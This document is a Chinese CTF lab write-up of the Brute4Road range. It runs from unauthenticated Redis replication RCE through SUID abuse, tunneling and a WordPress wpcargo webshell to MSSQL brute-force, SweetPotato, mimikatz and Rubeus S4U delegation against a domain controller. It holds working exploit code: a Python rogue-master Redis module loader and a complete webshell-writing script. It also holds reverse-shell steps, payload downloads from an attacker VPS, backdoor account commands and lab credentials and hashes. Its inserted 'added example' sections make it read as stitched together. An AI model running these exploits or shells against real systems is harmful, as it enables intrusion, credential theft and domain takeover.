春秋云境-Brute4Road

Information gathering

Visiting port 80 directly shows nothing useful to work with.

So let's scan with fscan:

.\fscan64.exe -h 39.98.112.117 -p 1-65535

fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.112.117 is alive
[*] Icmp alive hosts len is: 1
39.98.112.117:21 open
39.98.112.117:22 open
39.98.112.117:80 open
39.98.112.117:6379 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.112.117 code:200 len:4833 title:Welcome to CentOS
[+] Redis:39.98.112.117:6379 unauthorized file:/usr/local/redis/db/dump.rdb
[+] ftp://39.98.112.117:21:anonymous
[->]pub
completed 4/4
[*] scan finished, elapsed: 5m26.0972385s

The scan turns up an unauthenticated Redis instance (plus anonymous FTP).

Redis master/replica replication RCE

The version is old. On Redis 4.x and on 5.x before 5.0.5, an unauthenticated instance can be turned into a shell through master/replica replication: the attacker makes the victim a replica of a rogue master, which delivers a shared object in place of the RDB snapshot, and the victim is then told to MODULE LOAD it.

python3 redis-rce.py -r 39.98.112.117 -p 6379 -L VPSip -f exp.so

Here it is enough to pick the bind (forward) shell when the tool asks.
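As an added example (not the original post's redis-rce.py, and not code from the Redis project), the following Python shows what that tool does on the wire, written as pure functions so the exchange can be inspected offline: the RESP encoding of the commands sent to the victim, a version check against the range the post names, and the rogue master's side of the replication handshake that hands the module file to the replica in place of an RDB snapshot. The attacker address 10.0.0.1, port 21000 and the module name exp.so are placeholders.

```python
"""Added example, not the original post's redis-rce.py: the RESP traffic behind a
Redis master/replica RCE, as pure functions that can be inspected offline.
The attacker address, port and module name used in the demo are placeholders."""
from __future__ import annotations
import re
import socket


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, the wire form redis-cli uses."""
    chunks = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        chunks.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(chunks)


def probe_info(host: str, port: int = 6379, timeout: float = 5.0) -> bytes:
    """Send INFO server with no AUTH. An open instance answers with a bulk string;
    a protected one answers -NOAUTH (or -DENIED when protected-mode is on)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_command("INFO", "server"))
        return sock.recv(65536)


def parse_version(info_reply: bytes):
    """Extract redis_version as (major, minor, patch); None for error replies."""
    if info_reply.startswith(b"-"):
        return None
    m = re.search(rb"redis_version:(\d+)\.(\d+)\.(\d+)", info_reply)
    return tuple(int(x) for x in m.groups()) if m else None


def replication_rce_candidate(version) -> bool:
    """MODULE LOAD exists since 4.0; the rogue-master route is the classic one on
    4.x and on 5.x before 5.0.5 (the versions the post names). Newer builds may
    still load modules, so False means 'check further', not 'safe'."""
    major, minor, patch = version
    return major == 4 or (major == 5 and (minor, patch) < (0, 5))


def victim_command_sequence(rogue_ip: str, rogue_port: int, module: str = "exp.so") -> list:
    """What the attacker sends to the victim, in order (what redis-rce.py automates).
    Redis chdir()s into its configured dir, so ./exp.so resolves to dir/exp.so."""
    return [
        resp_command("CONFIG", "SET", "dbfilename", module),  # the 'RDB' is saved under this name
        resp_command("SLAVEOF", rogue_ip, str(rogue_port)),   # victim connects out to the rogue master
        resp_command("MODULE", "LOAD", f"./{module}"),        # dlopen() the file just delivered
        resp_command("SLAVEOF", "NO", "ONE"),                 # detach; the real data set stops being clobbered
    ]


class RogueMaster:
    """Minimal master side of the replication handshake: acknowledges PING/REPLCONF,
    then answers PSYNC with a full resync whose 'RDB' body is the module file."""

    def __init__(self, payload: bytes, repl_id: str = "0" * 40):
        self.payload = payload
        self.repl_id = repl_id

    @staticmethod
    def command_name(raw: bytes) -> str:
        parts = raw.split(b"\r\n")
        if raw.startswith(b"*") and len(parts) > 2:   # RESP array: first bulk string is the command
            name = parts[2]
        else:                                          # inline command
            name = parts[0].split(b" ")[0]
        return name.decode(errors="ignore").upper()

    def reply(self, raw: bytes) -> bytes:
        name = self.command_name(raw)
        if name == "PING":
            return b"+PONG\r\n"
        if name == "REPLCONF":                 # listening-port / capa ... all accepted
            return b"+OK\r\n"
        if name in ("PSYNC", "SYNC"):
            # Full resync at offset 1, then the payload as a bulk string with no trailing CRLF.
            header = f"+FULLRESYNC {self.repl_id} 1\r\n${len(self.payload)}\r\n".encode()
            return header + self.payload
        return b"-ERR unknown command\r\n"

    def serve_once(self, port: int, timeout: float = 10.0) -> None:
        """Accept one replica connection (the victim after SLAVEOF) and run the handshake."""
        with socket.socket() as srv:
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind(("0.0.0.0", port))
            srv.listen(1)
            srv.settimeout(timeout)
            conn, _ = srv.accept()
            with conn:
                conn.settimeout(timeout)
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(self.reply(data))
                    if self.command_name(data) in ("PSYNC", "SYNC"):
                        break


if __name__ == "__main__":
    for frame in victim_command_sequence("10.0.0.1", 21000):
        print(frame)
    print(RogueMaster(b"\x7fELF...").reply(resp_command("PSYNC", "?", "-1")))
```

The final SLAVEOF NO ONE matters: while the victim is a replica of the rogue master its real data set is replaced by the delivered file, and the replication state change is written to the Redis log, which is what a defender would look for. The version check is a triage aid only; a newer build with MODULE still enabled deserves the same attention.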

SUID base64 privilege escalation

Try SUID privilege escalation. List setuid-root binaries (errors go to /dev/null; the original redirected them into 1.txt, which only clutters the listing):

find / -user root -perm -4000 -print 2>/dev/null

base64 is in the list and can be abused to read any file as root (base64 is not setuid on a normal install, so this was set up deliberately). For example:

cd /etc
LFILE=shadow
base64 "$LFILE" | base64 --decode

Here we use it directly to read the flag:

base64 "/home/redis/flag/flag01" | base64 --decode

Switch to a reverse shell after all, filling in the listening IP and port.

Then upgrade the shell to an interactive TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Next, download fscan with wget to scan the internal network:

wget http://vps/fscan_amd64
chmod +x fscan_amd64

The environment was restarted partway through.

Check the host's internal address:

hostname -i

Internal network reconnaissance

./fscan_amd64 -h 172.22.2.0/16 >> 2.txt
cat 2.txt

172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.16:139 open
172.22.2.18:139 open
172.22.2.34:135 open
172.22.2.3:139 open
172.22.2.16:135 open
172.22.2.3:135 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.18:22 open
172.22.2.7:21 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.18:445 open
172.22.2.7:22 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetInfo:
[*]172.22.2.34
[->]CLIENT01
[->]172.22.2.34
[*] NetInfo:
[*]172.22.2.3
[->]DC
[->]172.22.2.3
[*] NetBios: 172.22.2.34 XIAORANG\CLIENT01
[*] NetInfo:
[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16
[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)
[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[+] ftp://172.22.2.7:21:anonymous
[->]pub
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
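Reading that flat output by eye is error-prone once the range grows. As an added example (not part of the original post), the Python below turns fscan's lines into a per-host inventory: open ports, NetBIOS/DNS names, domain or workgroup, OS string, the [+]DC marker and the weak-auth hits. The sample input is a subset of the scan lines above, embedded so the script runs offline.

```python
"""Added example, not part of the original post: turn fscan's flat output into a
per-host inventory. The sample lines are a subset of the scan above, embedded so
the script runs offline; nothing is fetched from the network."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE_OUTPUT = """
172.22.2.16:445 open
172.22.2.3:445 open
172.22.2.34:139 open
172.22.2.16:80 open
172.22.2.18:80 open
172.22.2.7:80 open
172.22.2.7:21 open
172.22.2.7:22 open
172.22.2.16:1433 open
172.22.2.7:6379 open
172.22.2.3:88 open
[*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS
[*] NetBios: 172.22.2.34 XIAORANG\\CLIENT01
[*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.2.18 WORKGROUP\\UBUNTU-WEB02
[+] ftp://172.22.2.7:21:anonymous
[*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
"""

PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
WEB_RE = re.compile(r"^\[\*\] WebTitle: https?://([^/:\s]+)(?::\d+)?\S* code:(\d+) len:\d+ title:(.*)$")
NB_RE = re.compile(r"^\[\*\] NetBios: (\S+) (.*)$")
AUTH_RE = re.compile(r"^\[\+\] (ftp|mssql|Redis)[:/]+([^:\s]+):(\d+)[: ](.*)$")

ROLE_PORTS = {21: "ftp", 22: "ssh", 80: "http", 88: "kerberos", 445: "smb",
              1433: "mssql", 3389: "rdp", 6379: "redis"}


@dataclass
class Host:
    ip: str
    ports: set = field(default_factory=set)
    names: list = field(default_factory=list)     # NetBIOS / DNS names seen
    domain: str | None = None                     # workgroup or AD domain
    os: str | None = None
    is_dc: bool = False                           # fscan marks DCs with [+]DC
    findings: list = field(default_factory=list)  # web titles and weak-auth hits


def parse_netbios(host: Host, rest: str) -> None:
    tokens = rest.split()
    if tokens and tokens[0] == "[+]DC":
        host.is_dc = True
        tokens = tokens[1:]
    if not tokens:
        return
    name = tokens[0]
    if "\\" in name:                              # DOMAIN\HOST or WORKGROUP\HOST
        host.domain, short = name.split("\\", 1)
        host.names.append(short)
    else:                                         # FQDN: domain is what follows the first dot
        host.names.append(name)
        if "." in name:
            host.domain = name.split(".", 1)[1]
    if len(tokens) > 1:
        host.os = " ".join(tokens[1:])


def parse_fscan(text: str) -> dict:
    hosts: dict[str, Host] = {}

    def get(ip: str) -> Host:
        return hosts.setdefault(ip, Host(ip))

    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            get(m[1]).ports.add(int(m[2]))
        elif m := WEB_RE.match(line):
            get(m[1]).findings.append(f"web:{m[2]} title={m[3].strip()!r}")
        elif m := NB_RE.match(line):
            parse_netbios(get(m[1]), m[2])
        elif m := AUTH_RE.match(line):
            get(m[2]).findings.append(f"{m[1].lower()}:{m[3]} {m[4].strip()}")
    return hosts


def roles(host: Host) -> list:
    return sorted(ROLE_PORTS[p] for p in host.ports if p in ROLE_PORTS)


def domain_controllers(hosts: dict) -> list:
    return sorted(h.ip for h in hosts.values() if h.is_dc or 88 in h.ports)


def hosts_with_port(hosts: dict, port: int) -> list:
    return sorted(h.ip for h in hosts.values() if port in h.ports)


def weak_auth(hosts: dict) -> list:
    """(ip, finding) for every anonymous / unauthenticated / cracked service fscan reported."""
    return sorted((h.ip, f) for h in hosts.values() for f in h.findings if not f.startswith("web:"))


if __name__ == "__main__":
    inventory = parse_fscan(SAMPLE_OUTPUT)
    for h in sorted(inventory.values(), key=lambda x: tuple(map(int, x.ip.split(".")))):
        print(h.ip, sorted(h.ports), h.names, h.domain, roles(h), h.findings)
    print("DCs:", domain_controllers(inventory), "weak auth:", weak_auth(inventory))
```

Run it against the real 2.txt instead of SAMPLE_OUTPUT and the same picture falls out as the one used in the rest of the post: 172.22.2.3 is the DC of xiaorang.lab, 172.22.2.16 is the MSSQL host, 172.22.2.18 is the WordPress box in its own workgroup, and 172.22.2.7 is the foothold with anonymous FTP.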

Upload frp, make the binaries executable, and run the server on the VPS and the client on the compromised host:

./frps -c ./frps.toml
./frpc -c ./frpc.toml

This proxies traffic into the internal network.
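The two config files are not shown in the post. As an added example (not the post's own files), here is a minimal pair in frp's TOML format (frp 0.52 and later) that exposes a SOCKS5 entry point on the VPS; the VPS address, token, port and SOCKS credentials are placeholders to be replaced.

```toml
# frps.toml, on the VPS (assumed values, not the post's file)
bindPort = 7000
auth.token = "replace-with-a-long-random-token"   # must match frpc; without it anyone can register proxies

# frpc.toml, on the compromised Redis host 172.22.2.7 (assumed values)
serverAddr = "VPS_IP"
serverPort = 7000
auth.token = "replace-with-a-long-random-token"

[[proxies]]
name = "socks5-intranet"
type = "tcp"
remotePort = 1080            # proxychains -> VPS_IP:1080 now reaches 172.22.2.0/24
[proxies.plugin]
type = "socks5"
username = "ops"             # frp binds remotePort on every VPS interface; leave these out and the
password = "replace-me-too"  # tunnel into the lab is an open proxy for anyone who finds it
```

Run frps on the VPS and frpc on 172.22.2.7, then point proxychains (or the scanner) at VPS_IP:1080 with those SOCKS credentials.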

WordPress n-day getshell

Next, attack the WordPress site; one of its plugins has a known (n-day) vulnerability.

You can enumerate it with wpscan (add --enumerate p to list the installed plugins):

wpscan --url http://example

WPScan checks a WordPress site for many kinds of security issues, including vulnerabilities in WordPress core, in plugins and in themes. The latest WPScan database holds more than 18,000 plugin vulnerabilities and 2,600 theme vulnerabilities, and it supports the latest WordPress releases. Besides looking for sensitive files such as robots.txt, it can also detect the currently enabled plugins and other features.

payload:

import sys
import binascii
import requests

# This is a magic string that, when treated as pixels and compressed using the PNG
# algorithm, causes <?=$_GET[1]($_POST[2]);?> to be written into the PNG file.
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'


def encode_character_code(c: int) -> str:
    # 8-bit binary with '0' replaced by 'x': '1' and 'x' become the barcode's two pixel colours.
    return '{:08b}'.format(c).replace('0', 'x')


text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = sys.argv[1] if len(sys.argv) > 1 else 'ls'   # command to run through the webshell

# With 1/11 scale, '1's are encoded as single white pixels, 'x's as single black pixels.
# filepath is attacker-controlled, so the "barcode" is written straight into the web root.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php"
    f"?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# The webshell is uploaded; now use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

This writes the webshell webshell.php into the web root.

Browsing the files, the database credentials are in the WordPress config file (wp-config.php):

WpuserEha8Fgj9

Connect with AntSword (蚁剑) to work with the shell comfortably.

Brute-forcing the database to take another host

Use the passwords from the S0meth1ng_y0u_m1ght_1ntereSted list as a wordlist and brute-force the MSSQL server found earlier:

[*]172.22.2.16
[->]MSSQLSERVER
[->]172.22.2.16

fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
[+] mssql:172.22.2.16:1433:sa ElGNkOiC

Then connect with MDUT, upload SweetPotato and use it to run commands as SYSTEM:

C:/Users/Public/SweetPotato.exe -a "whoami"
C:/Users/Public/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"

Requesting a ticket to take the domain controller

netstat -ano

This shows that the Remote Desktop port (3389) is listening.

Create a user, add it to the local administrators group, and connect over RDP:

C:/Users/Public/SweetPotato.exe -a "net user hey qwer1234! /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators hey /add"

systeminfo

systeminfo shows the machine is joined to the domain.

Run mimikatz from an elevated (Administrator) console:

privilege::debug
sekurlsa::logonpasswords

to see whether credentials can be read from LSASS.

This yields the NTLM hash of the machine account MSSQLSERVER$. BloodHound analysis also shows that MSSQLSERVER is configured with constrained delegation to the domain controller, so a high-privilege service ticket for the DC can be obtained through S4U.

Use Rubeus to request a TGT as MSSQLSERVER$ with its RC4 (NTLM) key:

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:0e5d39e29de768a96183420b878af977 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Then run the S4U chain (S4U2self as Administrator, S4U2proxy for CIFS on the DC) and inject the resulting ticket with /ptt:

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from the asktgt step above>

Rubeus v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 0e5d39e29de768a96183420b878af977
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

<base64 ticket omitted>

ServiceName : krbtgt/xiaorang.lab
ServiceRealm : XIAORANG.LAB
UserName : MSSQLSERVER$
UserRealm : XIAORANG.LAB
StartTime : 2024/1/29 19:51:29
EndTime : 2024/1/30 5:51:29
RenewTill : 2024/2/5 19:51:29
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : RHph2lTqnNwNKJVQkc02/A==
ASREP (key) : 0E5D39E29DE768A96183420B878AF977
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:<base64 TGT from above>

With that ticket in the session, the domain controller's file shares are accessible as Administrator; read the flag from there.


春秋云境-Brute4Road
https://www.smal1.black/春秋云境-Brute4Road.html
Author: Small Black
Published: 29 January 2024
License